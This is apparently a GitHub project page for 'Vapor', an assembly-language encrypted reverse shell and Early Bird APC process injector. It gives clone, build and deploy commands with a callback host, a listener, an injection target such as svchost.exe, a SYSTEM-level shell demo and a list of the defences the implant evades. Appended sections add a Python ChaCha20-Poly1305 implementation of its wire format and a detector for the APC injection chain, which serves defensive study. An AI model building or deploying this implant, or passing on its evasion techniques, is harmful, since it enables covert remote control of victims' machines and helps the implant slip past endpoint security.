Encrypted shell. Direct syscalls.

ChaCha20-Poly1305 encrypted reverse shell and process injector in pure x86_64 NASM assembly. Hell's Gate syscalls, PEB-walk API resolution, zero dependencies.

$ ./build.sh 10.10.14.1 443
[+] Generated 256-bit PSK
[+] Assembled vapor.bin (3,612 bytes)
[+] Linked vapor.exe
[+] Built injector.exe (vapor.bin embedded)

# Start listener
$ python3 listener.py --lport 443 --key a1b2c3...ef
[*] Listening on 0.0.0.0:443
[*] Connection from 10.10.10.5:49812
[*] ChaCha20-Poly1305 handshake complete

vapor> whoami
nt authority\system

ChaCha20-Poly1305 | Hell's Gate syscalls | 0 dependencies | x86_64 NASM

Pure assembly, no compromises

RFC 8439 authenticated encryption. Direct NT syscalls. Early Bird APC injection. All in ~3.6 KB of position-independent code.

ChaCha20-Poly1305 AEAD

Full RFC 8439 authenticated encryption in pure x86_64 assembly. 256-bit pre-shared key, fresh random 12-byte nonce per message via SystemFunction036 (RtlGenRandom). Tampered payloads silently rejected.

Wire format:
  [len 4B][nonce 12B][ciphertext][mac 16B]
  ChaCha20 block 0 → Poly1305 one-time key (OTK)
  Counter starts at 1 per RFC 8439

~3.6 KB of shellcode

Hell's Gate Syscalls

SSN extraction from ntdll stubs at runtime. Halo's Gate fallback scans neighbor stubs when hooked. Indirect gadget execution — return address traces to ntdll.

PEB Walk Resolution

All Windows APIs resolved via PEB walking and ror13 hash matching. No import table, no API name strings. Handles forwarded exports like SystemFunction036.

Early Bird APC

Target process created suspended. Shellcode written to remote memory (RW to RX) via NT syscalls, queued as APC. Fires before entry point — before EDR hooks.


Encrypted Reverse Shell

Piped command execution via CreateProcessA with cmd.exe /c. Stdout and stderr captured through anonymous pipes with PeekNamedPipe polling. 30-second timeout. All traffic authenticated and encrypted.

vapor> whoami
nt authority\system
vapor> dir C:\Users
Volume in drive C has no label.
Directory of C:\Users

Dual Output

Builds as raw PIC shellcode (vapor.bin) for injection and a minimal PE (vapor.exe) for direct execution. Same source, same crypto, two deployment paths.

Platform support

Pure x86_64 assembly implant with encrypted reverse shell and process injection on Linux.

Feature matrix (the per-cell icons did not survive extraction; only the row and column labels remain):
  Rows: Reverse Shell, ChaCha20 Encryption, Process Injection, Hell's Gate Syscalls, Anti-Debug, Static Binary, Zero Dependencies, Linux Only
  Columns: Windows, macOS
  Legend: Full / Limited / Not Supported

Four-layer implant design

API resolution, networking, cryptography, and command execution — all in pure x86_64 NASM with no external dependencies.

1. API Resolution
   PEB walk to InMemoryOrderModuleList. ror13 hash matching across kernel32, ws2_32, advapi32 export tables. Forwarded export handling for cryptbase.

2. Transport
   Raw TCP socket via WSASocketA and connect. WSAStartup initialization, configurable LHOST/LPORT baked in at assembly time.

3. Cryptography
   ChaCha20 quarter-round in registers, 10 double-rounds. Poly1305 with full mod 2^130-5 arithmetic. AEAD per RFC 8439 Section 2.8.

4. Execution
   CreateProcessA with cmd.exe /c. Anonymous pipe capture of stdout+stderr. PeekNamedPipe polling with 30s timeout. Nonce-per-message response encryption.
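The AEAD construction named in the Cryptography layer (ChaCha20 block 0 as the Poly1305 one-time key, data encrypted from counter 1, Poly1305 over padded ciphertext plus lengths, RFC 8439 Section 2.8) and the wire format given earlier ([len 4B][nonce 12B][ciphertext][mac 16B]) are shown below in a pure-Python implementation. This is an added example written for this page, not code from the Vapor project or its listener.py. Two details are assumptions because the page does not specify them: the 4-byte length prefix is taken as little-endian and as counting nonce + ciphertext + tag, and no associated data is used. The functions chacha20_block, poly1305_mac, aead_seal, aead_open, frame and unframe are names chosen here.

```python
"""RFC 8439 ChaCha20-Poly1305 AEAD plus a framer for the [len][nonce][ct][mac] wire format.

Assumptions (not stated on the page): the 4-byte length prefix is little-endian and
counts nonce + ciphertext + tag; the AEAD is used with empty associated data.
"""
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
P1305 = (1 << 130) - 5          # the Poly1305 prime 2^130 - 5


def _rotl(v, c):
    return ((v << c) & MASK32) | (v >> (32 - c))


def _qr(s, a, b, c, d):
    # ChaCha20 quarter-round on four words of the state (RFC 8439 section 2.1)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    # State: 4 constants, 8 key words, 32-bit counter, 3 nonce words; 10 double-rounds
    st = list(struct.unpack("<4I", b"expand 32-byte k"))
    st += struct.unpack("<8I", key) + (counter,) + struct.unpack("<3I", nonce)
    w = st[:]
    for _ in range(10):
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((w[i] + st[i]) & MASK32 for i in range(16)))


def chacha20_xor(key, counter, nonce, data):
    # Keystream XOR; the counter advances by one per 64-byte block
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(x ^ k for x, k in zip(data[off:off + 64], ks))
    return bytes(out)


def poly1305_mac(otk, msg):
    # r is clamped, s is added at the end; each 16-byte block gets a 0x01 high byte
    r = int.from_bytes(otk[:16], "little") & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
    s = int.from_bytes(otk[16:32], "little")
    acc = 0
    for off in range(0, len(msg), 16):
        n = int.from_bytes(msg[off:off + 16] + b"\x01", "little")
        acc = ((acc + n) * r) % P1305
    return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little")


def _pad16(b):
    return b"\x00" * (-len(b) % 16)


def _mac_input(aad, ct):
    # AEAD MAC input: aad | pad | ciphertext | pad | len(aad) | len(ct), both lengths 64-bit LE
    return aad + _pad16(aad) + ct + _pad16(ct) + struct.pack("<QQ", len(aad), len(ct))


def aead_seal(key, nonce, plaintext, aad=b""):
    otk = chacha20_block(key, 0, nonce)[:32]      # block 0 -> Poly1305 one-time key
    ct = chacha20_xor(key, 1, nonce, plaintext)   # data starts at counter 1
    return ct, poly1305_mac(otk, _mac_input(aad, ct))


def aead_open(key, nonce, ct, tag, aad=b""):
    otk = chacha20_block(key, 0, nonce)[:32]
    if not hmac.compare_digest(poly1305_mac(otk, _mac_input(aad, ct)), tag):
        return None   # tampered or wrong key: reject before producing any plaintext
    return chacha20_xor(key, 1, nonce, ct)


def frame(key, plaintext):
    # Fresh 12-byte nonce per message; a nonce must never repeat under one PSK
    nonce = os.urandom(12)
    ct, tag = aead_seal(key, nonce, plaintext)
    body = nonce + ct + tag
    return struct.pack("<I", len(body)) + body


def unframe(key, data):
    # Returns the plaintext, or None for a short, inconsistent or unauthenticated frame
    if len(data) < 4 + 12 + 16:
        return None
    (n,) = struct.unpack("<I", data[:4])
    if n != len(data) - 4:
        return None
    body = data[4:]
    return aead_open(key, body[:12], body[12:-16], body[-16:])
```

The length prefix is outside the authenticated region in this wire format, so a receiver must treat it only as a framing hint and bound it before allocating, as unframe does by rejecting any mismatch; the tag check happens before a single byte of plaintext is produced, which is what "tampered payloads silently rejected" means in practice.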

Build and deploy

One command generates a random PSK, assembles the implant, builds the injector, and prints the listener command.

Build:
$ git clone https://github.com/Real-Fruit-Snacks/Vapor.git
$ cd Vapor

# One-command build
$ ./build.sh 10.10.14.1 443

# Or with make directly
$ make LHOST=10.10.14.1 LPORT=443 KEY=<hex> all

Deploy:
# Start listener
$ python3 listener.py --lport 443 --key <key>

# Direct execution
PS> .\vapor.exe

# Or inject into a process
PS> .\injector.exe

# Custom injection target
$ make TARGET="svchost.exe" all

Know the boundaries

Evades

  • Import table analysis — zero static imports
  • Userland API hooking — indirect syscalls via ntdll
  • String scanning — API names resolved by hash
  • Traffic inspection — ChaCha20-Poly1305 AEAD
  • Early hook initialization — APC fires first

Visible To

  • ETW / kernel callbacks — kernel-level tracing
  • AMSI — script-based detection
  • Network metadata — raw TCP connection visible
  • Memory forensics — shellcode in process memory
  • Behavioral EDR — syscall pattern analysis
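The "Visible To" list is the defender's side of the Early Bird APC description above: a process created suspended, a remote write into it, an RW to RX protection change, an APC queued, and only then the thread resumed. Each step on its own is common; the ordered sequence from one actor against one target is what kernel callbacks and behavioral EDR can key on. The correlator below is an added example written for this page, not code from the Vapor project or from any EDR product. The event schema (Event, the five STAGES kind names, the old/new protection strings) and the sample telemetry returned by sample_events are constructed for the example and assume a telemetry source that reports these actions with actor and target PIDs.

```python
"""Correlate endpoint telemetry into the create-suspended -> write -> RX -> APC -> resume
chain. The event schema and sample events are constructed for this example; they do not
model any specific product's log format.
"""
from dataclasses import dataclass, field

# Ordered stages; a hit requires all five, in order, from one actor against one target
STAGES = ("process_create_suspended", "remote_write", "protect_change", "apc_queue", "thread_resume")


@dataclass
class Event:
    seq: int            # monotonic ordering from the sensor
    kind: str           # one of STAGES (other kinds are ignored)
    actor_pid: int      # process performing the action
    target_pid: int     # process acted upon (new process for create, remote for the rest)
    detail: dict = field(default_factory=dict)


def _stage_matches(ev, stage):
    if ev.kind != stage:
        return False
    if stage == "protect_change":
        # only a writable page turning executable matters (RW to RX on this page)
        return ev.detail.get("old") == "RW" and ev.detail.get("new", "").endswith("X")
    return True


def find_early_bird_apc(events):
    """Return (actor_pid, target_pid) pairs that completed the whole chain in order."""
    progress = {}   # (actor, target) -> index of the next stage expected
    hits = []
    for ev in sorted(events, key=lambda e: e.seq):
        key = (ev.actor_pid, ev.target_pid)
        if ev.kind == STAGES[0]:
            progress[key] = 1           # (re)start tracking on a suspended create
            continue
        idx = progress.get(key)
        if idx is None:
            continue                    # target was never created suspended by this actor
        if _stage_matches(ev, STAGES[idx]):
            idx += 1
            if idx == len(STAGES):
                hits.append(key)
                del progress[key]
            else:
                progress[key] = idx
        elif ev.kind == "thread_resume":
            # resumed without finishing the chain: benign suspended start (debuggers,
            # job-object setup, installers); stop tracking to keep state bounded
            del progress[key]
    return hits


def sample_events():
    """Constructed telemetry: one benign suspended start (pids 100->200), one full chain
    (pids 300->400) and one out-of-order sequence (pids 500->600) that must not alert."""
    return [
        Event(1, "process_create_suspended", 100, 200),
        Event(2, "thread_resume", 100, 200),
        Event(3, "process_create_suspended", 300, 400, {"image": "svchost.exe"}),
        Event(4, "remote_write", 300, 400, {"size": 3612}),
        Event(5, "protect_change", 300, 400, {"old": "RW", "new": "RX"}),
        Event(6, "apc_queue", 300, 400),
        Event(7, "thread_resume", 300, 400),
        Event(8, "process_create_suspended", 500, 600),
        Event(9, "apc_queue", 500, 600),            # APC before any write: wrong order
        Event(10, "remote_write", 500, 600),
        Event(11, "thread_resume", 500, 600),
    ]


if __name__ == "__main__":
    for actor, target in find_early_bird_apc(sample_events()):
        print(f"early-bird APC chain: pid {actor} -> pid {target}")
```

The correlator alerts on the full ordered chain rather than on any single call, which keeps false positives from debuggers and installers low; on the evasion side, the page notes that indirect syscalls bypass userland hooks, so this kind of sequence logic only works when the events come from kernel callbacks or ETW rather than from hooked ntdll stubs.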